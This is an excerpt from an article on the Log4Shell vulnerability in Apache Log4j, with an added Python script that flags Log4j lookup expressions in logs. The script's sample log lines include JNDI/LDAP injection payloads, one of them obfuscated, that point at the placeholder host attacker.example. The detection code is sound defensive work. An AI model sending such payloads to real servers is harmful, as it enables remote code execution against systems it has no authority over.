Following the December 2020 revelation of the SolarWinds software supply chain hack by Russian operatives, 2021 was not to be outdone: December 2021 marked the discovery of Java developers' "own goal" against the global IT/OT infrastructure.
About a decade ago, contributors to release 2 of the Apache Foundation's open source Log4j software thought it would be a neat idea for the message/event logging software to be able to send a log that would also execute code, explains Eric Byres, CTO at aDolus (www.aDolus.com).
"Effectively, the Log4Shell vulnerability in the Log4j library provides a way to bundle a command into a message that looks like an event log, send it to your potential victim's log collector, then initiate a takeover," Byres explains. The Log4j vulnerability is of particular concern because its use is extremely widespread, the exploit is trivial, and it is used in very high-level, mission-critical servers. "It's SolarWinds without the Russians," Byres adds.
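The mechanism Byres describes, a message that is logged but carries a lookup expression Log4j 2 evaluates, is something a defender can hunt for in collected logs. The Python below is an added example written for this page, not code from the article, from aDolus, or from the Log4j project. It assumes the well-known Log4j 2 lookup syntax `${...}` and models only three simple lookup forms (`lower:`, `upper:`, and the `:-default` fallback) so that a `jndi` reference split across nested lookups still surfaces after normalisation; the log lines and the `attacker.example` host are constructed sample data.

```python
"""Flag Log4j-style lookup expressions in log lines (constructed example)."""
import re

# A Log4j 2 lookup is ${...}; this matches an innermost one (no braces inside),
# so repeated substitution peels nested lookups from the inside out.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")


def _collapse(match: re.Match) -> str:
    """Replace one innermost lookup with the literal text it would yield.

    Only the simplest forms are modelled (assumption for this example):
      ${key:-default} -> default
      ${lower:X}      -> X lower-cased
      ${upper:X}      -> X upper-cased
    Any other lookup is replaced by its raw inner text.
    """
    inner = match.group(1)
    if ":-" in inner:
        inner = inner.split(":-", 1)[1]
    if inner.startswith("lower:"):
        return inner[len("lower:"):].lower()
    if inner.startswith("upper:"):
        return inner[len("upper:"):].upper()
    return inner


def flatten_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups until no ${...} remains (bounded to avoid loops)."""
    for _ in range(max_rounds):
        new_text = INNERMOST.sub(_collapse, text)
        if new_text == text:
            break
        text = new_text
    return text


def classify(line: str) -> str:
    """Return 'clean', 'lookup' (any ${...} present) or 'jndi-lookup'.

    Untrusted input should never contain lookup syntax at all, so any ${...}
    is worth a look; a jndi reference after normalisation is the high-priority
    case because that is the remote-class-loading path Log4Shell abused.
    """
    if not INNERMOST.search(line):
        return "clean"
    flattened = flatten_lookups(line).lower()
    return "jndi-lookup" if "jndi" in flattened else "lookup"


# Constructed sample access-log lines; attacker.example is a placeholder host.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET /" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.3 - - "GET /" 200 "${env:HOME}"',
]


def scan(lines: list[str]) -> list[tuple[int, str]]:
    """Return (line index, verdict) for every line that is not clean."""
    return [(i, v) for i, line in enumerate(lines) if (v := classify(line)) != "clean"]


if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE_LOGS):
        print(f"line {idx}: {verdict}: {SAMPLE_LOGS[idx]}")
```

Run on a real log export, the `scan` output is a triage list: every hit means lookup syntax reached a logger from untrusted input, and the `jndi-lookup` hits are the ones to escalate. The normalisation deliberately stays small; production rules should be paired with the vendor patches and with outbound-LDAP/RMI egress monitoring rather than relying on string matching alone.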
Read more on ControlGlobal.com.